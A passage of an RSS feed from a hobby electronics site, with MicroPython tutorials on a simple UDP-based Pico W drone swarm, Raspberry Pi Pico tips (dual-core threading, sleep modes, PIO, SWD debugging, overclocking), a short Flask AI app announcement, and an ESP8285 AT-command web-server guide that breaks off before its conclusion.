wlan.ifconfig())&lt;br&gt;&lt;br&gt;def listen():&lt;br&gt;&amp;nbsp; &amp;nbsp; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)&lt;br&gt;&amp;nbsp; &amp;nbsp; s.bind(('0.0.0.0', PORT))&lt;br&gt;&amp;nbsp; &amp;nbsp; while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; data, addr = s.recvfrom(1024)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; msg = data.decode()&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Received:", msg)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; try:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; x, y, z, cmd = msg.split(',')&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; # Simulated response: just print for now&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print(f"Following leader to X={x}, Y={y}, Z={z}")&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; # Here you would command motors or PID loop&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; except Exception as e:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; print("Error parsing message:", e)&lt;br&gt;&lt;br&gt;connect()&lt;br&gt;listen()&lt;/p&gt;&lt;h2 data-start="4094" data-end="4134"&gt; Behavior Logic – Follow-the-Leader&lt;/h2&gt;&lt;p data-start="4136" data-end="4196"&gt;To expand this swarm logic, implement simple behaviors like:&lt;/p&gt;&lt;ul data-start="4198" data-end="4331"&gt;&lt;li data-start="4198" data-end="4246"&gt;&lt;p data-start="4200" data-end="4246"&gt;Maintain fixed offset from leader (&lt;code data-start="4235" data-end="4239"&gt;dx&lt;/code&gt;, &lt;code data-start="4241" data-end="4245"&gt;dy&lt;/code&gt;)&lt;/p&gt;&lt;/li&gt;&lt;li data-start="4247" data-end="4277"&gt;&lt;p data-start="4249" data-end="4277"&gt;Collision avoidance (future)&lt;/p&gt;&lt;/li&gt;&lt;li data-start="4278" data-end="4331"&gt;&lt;p data-start="4280" data-end="4331"&gt;Priority rules (e.g., time delay between followers)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;# Within follower.py&lt;br&gt;offset_x = -5&amp;nbsp; # stay 5 meters behind&lt;br&gt;target_x = float(x) + offset_x&lt;br&gt;# PID control towards (target_x, y, z)&lt;/div&gt;&lt;div&gt;&lt;/div&gt;&lt;div&gt;&lt;h2 data-start="4519" data-end="4549"&gt; Visualization (Optional)&lt;/h2&gt;&lt;p data-start="4551" data-end="4652"&gt;Send drone telemetry to a PC or mobile dashboard using MQTT or WebSocket for real-time visualization.&lt;/p&gt;&lt;hr data-start="4654" data-end="4657"&gt;&lt;h2 data-start="4659" data-end="4687"&gt; Security Consideration&lt;/h2&gt;&lt;ul data-start="4689" data-end="4792"&gt;&lt;li data-start="4689" data-end="4712"&gt;&lt;p data-start="4691" data-end="4712"&gt;UDP is not encrypted.&lt;/p&gt;&lt;/li&gt;&lt;li data-start="4713" data-end="4792"&gt;&lt;p data-start="4715" data-end="4792"&gt;For more secure systems, switch to TLS over TCP or Wi-Fi direct + encryption.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="4794" data-end="4797"&gt;&lt;h2 data-start="4799" data-end="4822"&gt; Future Expansions&lt;/h2&gt;&lt;ul data-start="4824" data-end="5100"&gt;&lt;li data-start="4824" data-end="4868"&gt;&lt;p data-start="4826" data-end="4868"&gt;Use &lt;strong data-start="4830" data-end="4841"&gt;ESP-NOW&lt;/strong&gt; (ESP32) for mesh network&lt;/p&gt;&lt;/li&gt;&lt;li data-start="4869" data-end="4934"&gt;&lt;p data-start="4871" data-end="4934"&gt;Add &lt;strong data-start="4875" data-end="4898"&gt;collision avoidance&lt;/strong&gt; using ultrasonic sensors or LiDAR&lt;/p&gt;&lt;/li&gt;&lt;li data-start="4935" data-end="5015"&gt;&lt;p data-start="4937" data-end="5015"&gt;Use &lt;strong data-start="4941" data-end="4961"&gt;AI vision system&lt;/strong&gt; (YOLOv8 on Jetson Nano or Pi 5) for target tracking&lt;/p&gt;&lt;/li&gt;&lt;li data-start="5016" data-end="5100"&gt;&lt;p data-start="5018" data-end="5100"&gt;Switch from Pico W to &lt;strong data-start="5040" data-end="5052"&gt;ESP32-C3&lt;/strong&gt; for faster real-time messaging with BLE + Wi-Fi&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="5102" data-end="5105"&gt;&lt;h2 data-start="5107" data-end="5123"&gt; Conclusion&lt;/h2&gt;&lt;p data-start="5125" data-end="5293"&gt;With just a few Raspberry Pi Pico W boards and MicroPython, you can create a basic &lt;strong data-start="5208" data-end="5223"&gt;drone swarm&lt;/strong&gt; that shares data, coordinates movement, and follows a central leader.&lt;/p&gt;&lt;p data-start="5295" data-end="5435"&gt;This is just the foundation — from here, you can add AI, object detection, GPS-based positioning, and more advanced coordination algorithms.&lt;/p&gt;&lt;img alt="" src="https://iottechnews.com/wp-content/uploads/2024/10/ai-drone-swarms-artificial-intelligence-drones-military-uav-defence-defense-research-report-study.jpg" style="height:409px; width:622px"&gt;&lt;/div&gt;&lt;p data-start="3064" data-end="3156"&gt;&lt;/p&gt;&lt;p data-start="2128" data-end="2198"&gt;&lt;/p&gt;&lt;p data-start="1680" data-end="1828"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/79/creating-swarm-drones-with-raspberry-pico-and-micropython</guid>
<pubDate>Tue, 15 Jul 2025 19:40:26 +0000</pubDate>
</item>
<item>
<title>Useful Tips and Tricks for the Raspberry Pi Pico - Part 2</title>
<link>https://asky.uk/78/useful-tips-and-tricks-for-the-raspberry-pi-pico-part-2</link>
<description>&lt;h2&gt;4. &lt;strong&gt;Debugging with SWD&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;For advanced debugging, use the Pico’s Serial Wire Debug (SWD) interface. Connect an SWD debugger (like another Pico or a dedicated debugger) to the SWDIO and SWCLK pins. This allows you to step through C/C++ code or inspect memory in real-time.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Install OpenOCD and a compatible IDE like VS Code with the Cortex-Debug extension for a smooth debugging experience.&lt;/p&gt;&lt;h2&gt;5. &lt;strong&gt;Overclocking for Performance&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The RP2040 can be overclocked beyond its default 125 MHz for performance-intensive tasks. In MicroPython, adjust the clock speed with:&lt;/p&gt;&lt;pre&gt;import machine

machine.freq(200000000)  # Set to 200 MHz
print(machine.freq())     # Confirm the new frequency&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Overclocking increases power consumption and heat, so test thoroughly and ensure proper cooling.&lt;/p&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;p&gt;These tips—leveraging dual cores, managing power, using PIO, debugging with SWD, and overclocking—can significantly enhance your Raspberry Pi Pico projects. Experiment with these techniques to unlock the full potential of this tiny yet powerful microcontroller!&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://thepihut.com/cdn/shop/articles/Raspberry-Pi-Pico-getting-started_1.jpg" style="height:545px; width:1000px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/78/useful-tips-and-tricks-for-the-raspberry-pi-pico-part-2</guid>
<pubDate>Mon, 14 Jul 2025 21:36:57 +0000</pubDate>
</item>
<item>
<title>Useful Tips and Tricks for the Raspberry Pi Pico</title>
<link>https://asky.uk/77/useful-tips-and-tricks-for-the-raspberry-pi-pico</link>
<description>&lt;p&gt;The Raspberry Pi Pico is a versatile and affordable microcontroller that opens up a world of possibilities for hobbyists and developers. Here are a few practical tips and tricks to help you get the most out of your Raspberry Pi Pico.&lt;/p&gt;&lt;h2&gt;1. &lt;strong&gt;Dual-Core Programming with MicroPython&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The Raspberry Pi Pico's RP2040 chip has two cores, which you can utilize for parallel tasks. In MicroPython, you can run separate functions on each core using the _thread module. For example, one core can handle sensor readings while the other manages a display.&lt;/p&gt;&lt;pre&gt;import _thread
import time

def core1_task():
    while True:
        print("Running on Core 1")
        time.sleep(1)

def core0_task():
    while True:
        print("Running on Core 0")
        time.sleep(1)

_thread.start_new_thread(core1_task, ())
core0_task()&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Ensure shared resources (like GPIO pins) are managed carefully to avoid conflicts between cores.&lt;/p&gt;&lt;h2&gt;2. &lt;strong&gt;Power-Saving with Sleep Modes&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;To save power in battery-powered projects, use the Pico’s sleep modes. You can put the Pico into a low-power state using MicroPython’s machine.lightsleep() or machine.deepsleep(). For example:&lt;/p&gt;&lt;pre&gt;import machine
import time

# Enter light sleep for 5 seconds
machine.lightsleep(5000)&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Use deep sleep for ultra-low power consumption, but note that it resets the program unless you save state to RTC memory.&lt;/p&gt;&lt;h2&gt;3. &lt;strong&gt;Using PIO for Custom Protocols&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The Pico’s Programmable Input/Output (PIO) system is a powerful feature for creating custom communication protocols or handling precise timing. For instance, you can use PIO to drive WS2812B (NeoPixel) LEDs without taxing the CPU.&lt;/p&gt;&lt;pre&gt;from machine import Pin
from rp2 import PIO, StateMachine
from rp2.asm_pio import asm_pio

@asm_pio(sideset_init=PIO.OUT_LOW)
def ws2812():
    T1 = 2
    T2 = 5
    T3 = 3
    wrap_target()
    label("bitloop")
    out(x, 1)               .side(0)    [T3 - 1]
    jmp(not_x, "do_zero")   .side(1)    [T1 - 1]
    jmp("bitloop")          .side(1)    [T2 - 1]
    label("do_zero")
    nop()                   .side(0)    [T2 - 1]
    wrap()

# Example: Send RGB data to a NeoPixel
sm = StateMachine(0, ws2812, freq=8000000, sideset_base=Pin(0))
sm.active(1)&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Tip&lt;/strong&gt;: Study the RP2040 datasheet for PIO instructions to create custom protocols like I2S or custom serial interfaces.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi Pico</category>
<guid isPermaLink="true">https://asky.uk/77/useful-tips-and-tricks-for-the-raspberry-pi-pico</guid>
<pubDate>Mon, 14 Jul 2025 21:36:12 +0000</pubDate>
</item>
<item>
<title>Welcome to Asky AI - Raspberry Pi 2 POWER</title>
<link>https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power</link>
<description>&lt;p&gt;I’m learning backend dev and built this little AI web app as a project. It’s called Asky Bot, and it generates HTML/CSS from descriptions using OpenAI.&lt;/p&gt;&lt;p&gt;Link: &lt;a target="_blank" rel="nofollow" href="https://asky.uk/askyai"&gt;https://asky.uk/askyai&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Technologies:&lt;/p&gt;&lt;p&gt;Flask + Jinja2&lt;br&gt;DispatcherMiddleware for path management&lt;br&gt;Custom CSS, no JS frameworks&lt;br&gt;Raspberry Pi 2 hosting&lt;br&gt;If you’re learning Flask or AI integration, happy to share tips or code.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/PZcsKqDL/Screenshot-2025-07-18-at-07-26-45-Asky-AI-Home.png" style="height:192px; width:660px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power</guid>
<pubDate>Sun, 13 Jul 2025 21:46:32 +0000</pubDate>
</item>
<item>
<title>Creating a WiFi-Connected Web Server with ESP8285 and MicroPython?</title>
<link>https://asky.uk/75/creating-wifi-connected-web-server-with-esp8285-micropython</link>
<description># **Creating a WiFi-Connected Web Server with ESP8285 and MicroPython**&lt;br /&gt;
&lt;br /&gt;
## **Introduction** &amp;nbsp;&lt;br /&gt;
In the world of IoT (Internet of Things), connecting a microcontroller to WiFi and hosting a small web page is a fundamental skill. This guide will walk you through setting up an **ESP8285** (a WiFi-enabled microcontroller) with **MicroPython** to create a simple web server. By the end, you’ll have a device that connects to WiFi and serves a web page displaying real-time data.&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **1. Hardware and Software Requirements**&lt;br /&gt;
### **Hardware Needed:**&lt;br /&gt;
- **ESP8285 Module** (or ESP8266 with built-in WiFi)&lt;br /&gt;
- **RP2040 (Raspberry Pi Pico)** or another microcontroller with UART support&lt;br /&gt;
- **USB-to-Serial Adapter** (if not using a dev board)&lt;br /&gt;
- **Breadboard &amp;amp; Jumper Wires** (for connections)&lt;br /&gt;
- **3.3V Power Supply** (ESP modules are not 5V tolerant!)&lt;br /&gt;
&lt;br /&gt;
### **Software Needed:**&lt;br /&gt;
- **MicroPython Firmware** (flashed on the microcontroller)&lt;br /&gt;
- **Thonny IDE / VS Code with Pico-W-Go** (for coding)&lt;br /&gt;
- **AT Command Firmware** (if using ESP8285 in AT command mode)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **2. Connecting the ESP8285 to WiFi**&lt;br /&gt;
### **Step 1: Wiring the Hardware**&lt;br /&gt;
Connect the ESP8285 to your microcontroller (RP2040) as follows:&lt;br /&gt;
&lt;br /&gt;
| **ESP8285 Pin** | **RP2040 Pin** |&lt;br /&gt;
|----------------|---------------|&lt;br /&gt;
| TX &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| RX (GP1) &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| RX &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| TX (GP0) &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| VCC &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| 3.3V &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
| GND &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;| GND &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;|&lt;br /&gt;
&lt;br /&gt;
### **Step 2: Sending AT Commands**&lt;br /&gt;
The ESP8285 uses **AT commands** for WiFi configuration. Here’s how to connect it to a network:&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
from machine import UART, Pin&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
uart = UART(0, baudrate=115200, tx=Pin(0), rx=Pin(1)) &amp;nbsp;# UART0 on GPIO0 (TX) and GPIO1 (RX)&lt;br /&gt;
&lt;br /&gt;
def send_at_command(cmd, timeout=2000):&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;&amp;gt;&amp;gt;&amp;quot;, cmd)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uart.write(cmd + &amp;quot;\r\n&amp;quot;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;start = time.ticks_ms()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = &amp;quot;&amp;quot;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while time.ticks_diff(time.ticks_ms(), start) &amp;lt; timeout:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if uart.any():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response += uart.read().decode()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if &amp;quot;OK&amp;quot; in response or &amp;quot;ERROR&amp;quot; in response:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;&amp;lt;&amp;lt;&amp;quot;, response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return response&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;print(&amp;quot;Timeout:&amp;quot;, response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return response&lt;br /&gt;
&lt;br /&gt;
# Connect to WiFi&lt;br /&gt;
send_at_command(&amp;#039;AT+CWMODE=1&amp;#039;) &amp;nbsp;# Set to Station mode&lt;br /&gt;
send_at_command(&amp;#039;AT+CWJAP=&amp;quot;YourWiFiSSID&amp;quot;,&amp;quot;YourPassword&amp;quot;&amp;#039;, timeout=10000) &amp;nbsp;# Join network&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
**Expected Output:** &amp;nbsp;&lt;br /&gt;
```&lt;br /&gt;
&amp;gt;&amp;gt; AT+CWJAP=&amp;quot;YourWiFiSSID&amp;quot;,&amp;quot;YourPassword&amp;quot;&lt;br /&gt;
&amp;lt;&amp;lt; WIFI CONNECTED&lt;br /&gt;
&amp;lt;&amp;lt; WIFI GOT IP&lt;br /&gt;
&amp;lt;&amp;lt; OK&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **Step 3: Verify Connection**&lt;br /&gt;
Check the assigned IP address:&lt;br /&gt;
```python&lt;br /&gt;
ip_response = send_at_command(&amp;quot;AT+CIFSR&amp;quot;)&lt;br /&gt;
print(&amp;quot;IP Address:&amp;quot;, ip_response.split(&amp;#039;STAIP,&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0])&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **3. Creating a Basic Web Server**&lt;br /&gt;
### **Step 1: Start a TCP Server**&lt;br /&gt;
The ESP8285 can host a simple web server on **port 80** (or another port if needed).&lt;br /&gt;
&lt;br /&gt;
```python&lt;br /&gt;
send_at_command(&amp;#039;AT+CIPMUX=1&amp;#039;) &amp;nbsp;# Enable multiple connections&lt;br /&gt;
send_at_command(&amp;#039;AT+CIPSERVER=1,80&amp;#039;) &amp;nbsp;# Start server on port 80&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **Step 2: Handle HTTP Requests**&lt;br /&gt;
When a browser connects, the ESP8285 receives a request like:&lt;br /&gt;
```&lt;br /&gt;
GET / HTTP/1.1&lt;br /&gt;
Host: 192.168.1.100&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
We respond with a simple HTML page:&lt;br /&gt;
```python&lt;br /&gt;
def handle_request():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;html = &amp;quot;&amp;quot;&amp;quot;HTTP/1.1 200 OK&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!DOCTYPE html&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;title&amp;gt;ESP8285 Web Server&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;h1&amp;gt;Hello from ESP8285!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;p&amp;gt;IP: {ip}&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;p&amp;gt;Signal: {rssi} dBm&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if uart.any():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;data = uart.read().decode()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if &amp;quot;+IPD,&amp;quot; in data: &amp;nbsp;# New connection&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;conn_id = data.split(&amp;#039;,&amp;#039;)[0][-1]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ip = send_at_command(&amp;quot;AT+CIFSR&amp;quot;).split(&amp;#039;STAIP,&amp;quot;&amp;#039;)[1].split(&amp;#039;&amp;quot;&amp;#039;)[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;rssi = send_at_command(&amp;quot;AT+CWJAP?&amp;quot;).split(&amp;#039;,&amp;#039;)[-1].replace(&amp;#039;&amp;quot;&amp;#039;,&amp;#039;&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;response = html.format(ip=ip, rssi=rssi)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;send_at_command(f&amp;#039;AT+CIPSEND={conn_id},{len(response)}&amp;#039;)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;time.sleep(1) &amp;nbsp;# Wait before sending data&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;uart.write(response)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;send_at_command(f&amp;#039;AT+CIPCLOSE={conn_id}&amp;#039;)&lt;br /&gt;
&lt;br /&gt;
handle_request()&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **Step 3: Access the Web Page**&lt;br /&gt;
Open a browser and enter:&lt;br /&gt;
```&lt;br /&gt;
http://[ESP_IP]&lt;br /&gt;
```&lt;br /&gt;
Example: `http://192.168.1.100`&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **4. Troubleshooting Common Issues**&lt;br /&gt;
### **1. No WiFi Connection?**&lt;br /&gt;
- Check power supply (3.3V only!)&lt;br /&gt;
- Verify SSID/password&lt;br /&gt;
- Ensure the ESP8285 is in **Station Mode** (`AT+CWMODE=1`)&lt;br /&gt;
&lt;br /&gt;
### **2. Web Page Not Loading?**&lt;br /&gt;
- Ensure the server is running (`AT+CIPSERVER=1,80`)&lt;br /&gt;
- Check if another service (like Apache) is blocking port 80&lt;br /&gt;
- Test with `curl`:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```bash&lt;br /&gt;
&amp;nbsp;&amp;nbsp;curl http://192.168.1.100&lt;br /&gt;
&amp;nbsp;&amp;nbsp;```&lt;br /&gt;
&lt;br /&gt;
### **3. Slow Response?**&lt;br /&gt;
- Increase UART baud rate (`AT+UART_DEF=115200,8,1,0,0`)&lt;br /&gt;
- Reduce HTML size (avoid large files)&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **5. Enhancing the Web Server**&lt;br /&gt;
### **1. Adding Dynamic Data**&lt;br /&gt;
You can display sensor data (e.g., temperature):&lt;br /&gt;
```python&lt;br /&gt;
html = &amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;lt;p&amp;gt;Temperature: {temp}°C&amp;lt;/p&amp;gt;&lt;br /&gt;
&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
response = html.format(temp=read_sensor())&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **2. Adding Interactive Buttons**&lt;br /&gt;
Use HTML forms to control GPIOs:&lt;br /&gt;
```html&lt;br /&gt;
&amp;lt;form action=&amp;quot;/led&amp;quot; method=&amp;quot;GET&amp;quot;&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;button name=&amp;quot;state&amp;quot; value=&amp;quot;on&amp;quot;&amp;gt;Turn LED ON&amp;lt;/button&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;lt;button name=&amp;quot;state&amp;quot; value=&amp;quot;off&amp;quot;&amp;gt;Turn LED OFF&amp;lt;/button&amp;gt;&lt;br /&gt;
&amp;lt;/form&amp;gt;&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
### **3. Using CSS for Better UI**&lt;br /&gt;
Embed styles for a modern look:&lt;br /&gt;
```html&lt;br /&gt;
&amp;lt;style&amp;gt;&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;body { font-family: Arial; margin: 20px; }&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;.card { background: #f5f5f5; padding: 15px; border-radius: 5px; }&lt;br /&gt;
&amp;lt;/style&amp;gt;&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
---&lt;br /&gt;
&lt;br /&gt;
## **Conclusion**&lt;br /&gt;
By following this guide, you’ve learned how to:&lt;br /&gt;
